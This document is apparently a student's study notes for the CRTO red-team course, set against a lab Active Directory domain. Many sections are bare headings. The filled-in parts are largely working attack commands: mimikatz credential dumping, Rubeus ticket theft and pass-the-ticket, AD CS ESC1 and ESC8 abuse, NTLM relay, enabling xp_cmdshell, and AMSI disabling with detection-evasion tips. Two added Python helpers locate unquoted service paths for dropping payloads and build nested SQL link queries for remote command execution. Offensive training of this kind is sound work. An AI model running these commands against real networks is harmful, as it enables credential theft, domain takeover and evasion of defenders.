CRTO note
Large parts of it lack detail; some of that detail is unnecessary, and some I was too lazy to write. I might fill it in later when I have time.
External Reconnaissance
DNS Records
dig
whois
dnscan
Spoofy - weak email security (SPF, DMARC and DKIM)
Google Dorks
site intitle inurl intext filetype
Social Media
Initial Compromise
HTML Smuggling
Password Spraying
Two excellent tools for password spraying against Office 365 and Exchange are MailSniper and SprayingToolkit.
Next, we need to find valid usernames from the list of users enumerated from https://cyberbotic.io.
nameenum.py is a python script that I’ve used for as long as I can remember.
It will take a person’s full name and transform it into possible username permutations.
Internal Phishing
Initial Access Payloads
VBA Macros
Remote Template Injection
Host Reconnaissance
Before we carry out any post-exploitation steps, it's prudent to take stock of the current situation.
'Offense in Depth' is a similar concept for red teamers.
processes
ps
User Sessions
net logons
Seatbelt
Seatbelt is a C# tool which automatically collects enumeration data for a host.
beacon> execute-assembly C:\Seatbelt.exe -group=system
Screenshots
beacon> screenshot
Keylogger
beacon> keylogger
beacon> jobs
beacon> jobkill 6
Clipboard
beacon> clipboard
Host Persistence
Task Scheduler
Startup Folder
C:\Users\abcd\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Registry AutoRun
Hunting for COM Hijacks
need to dive into it
Host Privilege Escalation
Windows Services
Unquoted Service Paths
beacon> run wmic service get name,pathname
beacon> powershell Get-Acl -Path "C:\Program Files\Vulnerable Services" | fl
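An added example, not part of the original note: a Python parser for `wmic service get name,pathname` output that flags unquoted service paths containing spaces and lists the paths Windows would try before the real binary (each prefix that ends at a space, with .exe appended), which is exactly where a payload has to be dropped. The wmic output embedded below is constructed; `check_writable` is an optional, hypothetical extra that only makes sense when run on the target host itself, and is the equivalent of the Get-Acl check above.

```python
import os
import re

# Constructed sample of `wmic service get name,pathname` output (not captured from a real host).
SAMPLE_WMIC = r"""Name                     PathName
VulnService              C:\Program Files\Vulnerable Services\Service.exe
Spooler                  C:\Windows\System32\spoolsv.exe
GoodService              "C:\Program Files\Good Service\svc.exe" -config default
UpdaterSvc               C:\Program Files (x86)\Acme\Updater\update.exe -service
"""

_EXE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)


def parse_wmic(output: str) -> list[tuple[str, str]]:
    """Split wmic's fixed-width table into (name, pathname) pairs, skipping the header row."""
    rows = []
    for line in output.splitlines()[1:]:
        line = line.strip()
        if not line:
            continue
        cols = re.split(r"\s{2,}", line, maxsplit=1)
        if len(cols) == 2:
            rows.append((cols[0], cols[1]))
    return rows


def hijack_candidates(pathname: str) -> list[str]:
    r"""Paths CreateProcess tries before the real binary when a service path is unquoted
    and contains spaces. For C:\Program Files\Vulnerable Services\Service.exe that is
    C:\Program.exe and then C:\Program Files\Vulnerable.exe. Returns [] when not vulnerable."""
    if pathname.startswith('"'):
        return []  # quoted: the loader knows exactly which file to run
    m = _EXE.match(pathname)
    if not m:
        return []
    exe = m.group(1)  # drop any service arguments that follow the executable
    if " " not in exe:
        return []
    words = exe.split(" ")
    # every prefix that ends at a space is tried as "<prefix>.exe" before the full path
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]


def find_unquoted(output: str, check_writable: bool = False) -> list[dict]:
    """Return the vulnerable services. With check_writable=True (meaningful only on the
    target host) keep only candidates whose directory the current user can write to."""
    findings = []
    for name, path in parse_wmic(output):
        cands = hijack_candidates(path)
        if check_writable:
            cands = [c for c in cands if os.access(os.path.dirname(c), os.W_OK)]
        if cands:
            findings.append({"service": name, "path": path, "candidates": cands})
    return findings


if __name__ == "__main__":
    for f in find_unquoted(SAMPLE_WMIC):
        print(f"{f['service']}: {f['path']}")
        for c in f["candidates"]:
            print(f"    try dropping {c}")
```

Note that `C:\Program.exe` is a candidate for almost every unquoted path under Program Files but the root of C: is not writable by standard users by default, so the interesting candidates are usually the deeper ones inside the vendor's own directory.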
Weak Service Permissions
Weak Service Binary Permissions
UAC Bypasses
beacon> elevate uac-schtasks tcp-local
Credential Theft
beacon> mimikatz token::elevate ; lsadump::sam
beacon> mimikatz !sekurlsa::logonpasswords # OPSEC: event 4656
Extracting Kerberos Tickets
beacon> execute-assembly C:\Rubeus.exe triage
If we only wanted the TGT for jking, we can do:
beacon> execute-assembly C:\Rubeus.exe dump /luid:0x7049f /service:krbtgt
DCSync
DCSync uses the DRSUAPI GetNCChanges call, which requires the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain; by default only domain administrator groups and domain controllers hold them.
Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background.
OPSEC: it generates 4662 events (directory service object access) on the DC.
Domain Reconnaissance
PowerView
beacon> powershell-import C:\PowerView.ps1
beacon> powershell Get-Domain
beacon> powershell Get-DomainController | select Forest, Name, OSVersion | fl
beacon> powershell Get-ForestDomain
Returns the default domain policy or the domain controller policy for the current domain.
Useful for finding information such as the domain password policy.
beacon> powershell Get-DomainPolicyData | select -expand SystemAccess
Returns all or specific user(s). To only return specific properties, use -Properties. Use -Identity to return a specific user.
beacon> powershell Get-DomainUser -Identity jking -Properties DisplayName, MemberOf |fl
Return all computers or specific computer objects
beacon> powershell Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
beacon> powershell Get-DomainTrust
SharpView
It has much the same functionality.
ADSearch
User Impersonation
Pass the Hash
beacon> pth DEV\jking
beacon> ls \\web.dev.cyberbotic.io\C$
beacon> rev2self
Pass The Ticket
beacon> execute-assembly C:\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
beacon> execute-assembly C:\Rubeus.exe ptt /luid:0x798c2c /ticket:
beacon> steal_token <PID of the process created in the first step>
OPSEC: when createnetonly is run without credentials, the logon event for the new session carries no meaningful domain/username. Supplying fake ones makes the session look more like a normal logon:
beacon> execute-assembly C:\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123
Overpass the Hash
Overpass the Hash is a technique which allows us to request a Kerberos TGT for a user, using their NTLM or AES hash.
Elevated privileges are required to obtain user hashes, but not to actually request a ticket. Prefer the AES256 key where you have it: requesting with the NTLM hash produces an RC4-encrypted ticket request, which stands out in 4768 events on domains where AES is the norm.
beacon> execute-assembly C:\Rubeus.exe asktgt /user:jking /ntlm: /nowrap
beacon> execute-assembly C:\Rubeus.exe asktgt /user:jking /aes256: /nowrap
Token Impersonation
beacon> steal_token 5536
Token Store
Cobalt Strike 4.8 introduced a new set of commands called token-store. This is an evolution of the steal_token command which allows
you to steal and store tokens for future use.
beacon> token-store steal 5536
beacon> token-store use 0
Make Token
The make_token command allows you to impersonate a user if you know their plaintext password.
beacon> make_token DEV\jking Qwerty123
beacon> remote-exec winrm web.dev.cyberbotic.io whoami
Process Injection
Lateral Movement
jump
Windows Remote Management
winrm and winrm64
PsExec
Windows Management Instrumentation (WMI)
Session Passing
Use different C2 frameworks as backup access in the event the current access is lost.
Beacon passing
spawn
Data Protection API
Kerberos
Scheduled Task Credentials
Resource-Based Constrained Delegation (RBCD)
The two major prerequisites to pull off the attack are:
1. A target computer on which you can modify msDS-AllowedToActOnBehalfOfOtherIdentity.
2. Control of another principal that has an SPN.
Shadow Credentials
Kerberos Relay Attacks
Kerberoasting
ASPREP Roasting
Unconstrained Delegation
Constrained Delegation
Alternate Service Name
S4U2Self Abuse
Pivoting
SOCKS Proxies
Relaying WebDAV
Linux Tools
Pivoting with Kerberos
getTGT.py -dc-ip 10.10.122.10 -aesKey dev.cyberbotic.io/jking
export KRB5CCNAME=jking.ccache
Now we can use psexec.py to get a SYSTEM shell on web:
psexec.py -dc-ip 10.10.122.10 -target-ip 10.10.122.30 -no-pass -k dev.cyberbotic.io/jking@web.dev.cyberbotic.io
NTLM Relaying
Active Directory Certificate Services
AD CS is a server role that allows you to build a public key infrastructure (PKI).
This can provide public key cryptography, digital certificates, and digital signature capabilities.
Misconfigurations can introduce security risks that actors can exploit, in this case for privilege escalation (even domain user to domain admin) and persistence.
Finding Certificate Authorities
This will output a lot of useful information, including the root CA and subordinate CAs.
beacon> execute-assembly C:\Certify.exe cas
Misconfigured Certificate Templates
Certify can also find vulnerable templates
beacon> execute-assembly C:\Certify.exe find /vulnerable
What template is vulnerable?
1. This template is served by sub-ca.
2. The template is called CustomUser.
3. ENROLLEE_SUPPLIES_SUBJECT is enabled, which allows the certificate requestor to provide any SAN.
4. The certificate usage has Client Authentication set.
5. DEV\Domain Users have enrollment rights, so any domain user may request a certificate from this template.
This configuration (ESC1) allows any domain user to request a certificate for any other domain user (including a domain admin) and use it for
authentication. Request a certificate for nlamb:
beacon> execute-assembly C:\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb
Copy the whole certificate (both the private key and certificate) and save it to cert.pem on Ubuntu WSL. Then use the provided openssl
command to convert it to PFX format:
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Convert cert.pfx into a base64 encoded string so it can be used with Rubeus:
$ cat cert.pfx | base64 -w 0
Then use asktgt to request a TGT for the user with the certificate (PKINIT):
beacon> execute-assembly C:\Rubeus.exe asktgt /user:nlamb /certificate:<base64 of cert.pfx> /password:pass123 /nowrap
NTLM Relaying to ADCS HTTP Endpoints
AD CS supports HTTP enrolment methods and includes a web GUI. This endpoint is usually found at http[s]://<ca-host>/certsrv
If NTLM authentication is enabled on it, these endpoints are vulnerable to NTLM relay attacks (ESC8).
To achieve this,we need:
- PortBender on WorkStation 2 to capture traffic on port 445 and redirect it to port 8445.
- A reverse port forward to forward traffic hitting port 8445 to the team server on port 445.
- A SOCKS proxy for ntlmrelayx to send traffic back into the network.
$ sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server
Then force the authentication to occur from WEB to WKSTN-2
beacon> execute-assembly C:\SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102
User & Computer Persistence
Certificates can also be useful for maintaining persistent access to both users and computers.
Certificates can be exported with Mimikatz using crypto::certificates (although it drops them to disk).
beacon> mimikatz crypto::certificates /export
Computer Persistence
beacon> mimikatz !crypto::certificates /systemstore:local_machine /export
Group Policy
Group Policy is the central repository in a forest or domain that controls the configuration of computers and users.
Group Policy Objects (GPOs) are sets of configurations that are applied to Organisational Units (OUs). By default, only Domain Admins can
create GPOs and link them to OUs, but it's common practice to delegate those rights to other teams.
This can create privilege escalation opportunities by allowing a user to apply malicious GPOs to domain admin users or their computers.
Modify Existing GPO
Enumerate all GPOs in the domain with Get-DomainGPO and check the ACL of each one with Get-DomainObjectAcl
Resolve the GPO name and the SID of the principal
we can modify the associated files directly in SYSVOL
use an automated tool such as SharpGPOAbuse
Create & Link a GPO
We can find these with PowerView's Get-DomainObjectAcl cmdlet by looking for principals that have "CreateChild" rights on the "Group-Policy-Container" object, and then resolving their SIDs to readable names.
To link the new GPO to an OU, also look for instances of "WriteProperty" over "GP-Link" on that OU.
Note: some GPO-pushed settings require a reboot to execute.
MS SQL Servers
Command Execution
To enumerate the current state of xp_cmdshell, use:
SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';
A value of 0 shows that xp_cmdshell is disabled. To enable it (requires sysadmin):
sp_configure 'Show Advanced Options', 1; RECONFIGURE;
sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Query again and the xp_cmdshell value should be 1; xp_cmdshell will also now work:
EXEC xp_cmdshell 'whoami';
Lateral Movement
SQL Servers have a concept called "links",which allows a database instance to access data from an external source.
We can discover any links that the current instance has:
SQL> SELECT srvname, srvproduct, rpcout FROM master..sysservers;
This shows that SQL-2 has a link to SQL-1. The SQLRecon links module could also be used.
beacon> execute-assembly C:\SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io,1433 /m:links
We can send SQL queries to linked servers using OpenQuery:
SQL> SELECT * FROM OPENQUERY("sql-1.dev.cyberbotic.io",'select @@servername'); # notice,double and single quotes
Or with SQLRecon
beacon> execute-assembly C:\SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io,1433 /m:lquery /l:sql-1.dev.cyberbotic.io /c:"select @@servername"
Then use xp_cmdshell to get access.
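Added example (not from the original note or from SQLRecon): a small Python helper that builds the nested OPENQUERY and EXEC ... AT statements for a chain of links, doubling the single quotes correctly at every hop, which is the part that is easy to get wrong by hand once there is more than one hop. sql-2 -> sql-1 is the link found above; the second hop to sql-0 is hypothetical. EXEC ... AT needs rpcout enabled on the link, which is why the sysservers query above selects that column.

```python
def _q(sql: str) -> str:
    """Double every single quote so `sql` can be embedded in a T-SQL string literal."""
    return sql.replace("'", "''")


def openquery_chain(links: list[str], query: str) -> str:
    """Wrap `query` in nested OPENQUERY calls so it executes on the last server in `links`.

    `links` is the hop order starting from the instance we are connected to:
    ["sql-1"] runs on sql-1; ["sql-1", "sql-0"] runs on sql-0 via sql-1.
    Every extra hop doubles the single quotes of everything already inside it.
    """
    sql = query
    for link in reversed(links):
        sql = f"SELECT * FROM OPENQUERY(\"{link}\", '{_q(sql)}')"
    return sql


def exec_at_chain(links: list[str], statement: str) -> str:
    """Same idea for EXEC (...) AT "link", which (unlike OPENQUERY) can run non-SELECT
    statements such as sp_configure remotely. It needs rpcout = 1 on every link used."""
    sql = statement
    for link in reversed(links):
        sql = f"EXEC ('{_q(sql)}') AT \"{link}\""
    return sql


# The statements from this section, ready to be pushed down a link chain.
ENABLE_XP_CMDSHELL = (
    "sp_configure 'Show Advanced Options', 1; RECONFIGURE; "
    "sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
)
CHECK_XP_CMDSHELL = "SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell'"


if __name__ == "__main__":
    # sql-2 -> sql-1 is the link found above; sql-1 -> sql-0 is a hypothetical second hop.
    chain = ["sql-1.dev.cyberbotic.io", "sql-0.dev.cyberbotic.io"]
    print(openquery_chain(chain, CHECK_XP_CMDSHELL))
    print(exec_at_chain(chain, ENABLE_XP_CMDSHELL))
    print(exec_at_chain(chain, "EXEC xp_cmdshell 'whoami'"))
```

The quote count grows as 2, 4, 8 at each depth, so a three-hop chain already carries eight consecutive quotes around the innermost literal; generating the statement rather than typing it avoids the off-by-one that silently returns a syntax error from the far server.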
Privilege Escalation
Use SweetPotato
beacon> execute-assembly C:\SweetPotato.exe -p cmd
Microsoft Configuration Manager
Domain Dominance
Keep Calm And Rebuild The Entire Forest
Silver Tickets
Golden Tickets
Diamond Tickets
Forged Certificates
Forest & Domain Trusts
beacon> powershell Get-DomainTrust
Parent/Child
SID history was designed to support migration scenarios, where a user would be moved from one domain to another.
One-way Inbound
Inbound trust
Domain A has a one-way inbound trust from Domain B. This means Domain B trusts Domain A, so principals in Domain A can access resources in Domain B; a Domain B account gets you nothing in Domain A.
One-way Outbound
Outbound trust
Domain A has a one-way outbound trust to Domain B. This means Domain A trusts Domain B, so principals in Domain B can access resources in Domain A, but not the other way around.
Local Administrator Password Solution
gold image
ms-Mcs-AdmPwd
Microsoft Defender Antivirus
Get-MpThreatDetection | Sort-Object InitialDetectionTime | Select-Object -First 1
Command Line Detections
like: pth
Artifact Kit
It's too troublesome and a bit inefficient?
Is it the loader that it actually modifies?
Malleable C2
memory scan
set userwx "false";
Allocate Beacon's memory as RW and then flip it to RX, instead of using RWX pages.
set cleanup "true";
It tells Beacon to free the memory associated with the reflective loader after it has been loaded.
set obfuscate "true";
Load Beacon into memory without its DLL headers (and obfuscate the import table and unused header content).
set module_x64 "xpsservices.dll";
Module stomping: Beacon loads this DLL from disk and overwrites its memory with itself, so Beacon appears to be a DLL loaded from disk rather than unbacked memory. Two requirements:
1. The DLL size must be equal to or greater than Beacon.
2. The DLL must not be needed by the application hosting Beacon. This isn't a concern when executing the artifacts, but does become relevant when injecting Beacon shellcode into existing processes.
Resource Kit
AMSI
AMSI vs Post-Exploitation
Cobalt Strike introduced a configuration that we can apply in Malleable C2 called amsi_disable.
This uses a memory-patching technique which I have blogged about before to disable AMSI in the spawned process prior to injecting the post-ex capability.
Right above the "http-get" block, add the following:
post-ex {
set amsi_disable "true";
}
Tip: amsi_disable only applies to powerpick, execute-assembly and psinject. It does not apply to the powershell command.
Manual AMSI Bypasses
Behavioural Detections
beacon> spawnto
Parent/Child Relationship
Application Whitelisting
AppLocker
Its purpose is to restrict the applications and scripts that are allowed to run on a machine.
Writeable Paths
The default AppLocker rules allow anything under C:\Program Files and C:\Windows (including subdirectories) to run, so look for subdirectories there that standard users can write to.
Living Off The Land Binaries, Script and Libraries
MSBuild.exe
Beacon DLL
DLL enforcement is not commonly enabled which allows us to call exported functions from DLLs on disk via rundll32.
Beacon's DLL payload exposes several exports including DllMain and StartW.
C:\Windows\System32\rundll32.exe http_x64.dll,StartW
Data Hunting & Exfiltration
File Shares
Database
Extending Cobalt Strike
The best C2 frameworks are those that have the capability to customise and diversify their behaviour.
The ".cna" files that we load into the cobalt strike script manager are called Aggressor Scripts.
Beacon Object Files
beacon> inline-execute C:\Demo.o
BOFs can be integrated with Aggressor by registering custom aliases and commands.
Malleable Command & Control
Many of Beacon's indicators are controllable via malleable C2 profiles,including network and in-memory artifacts.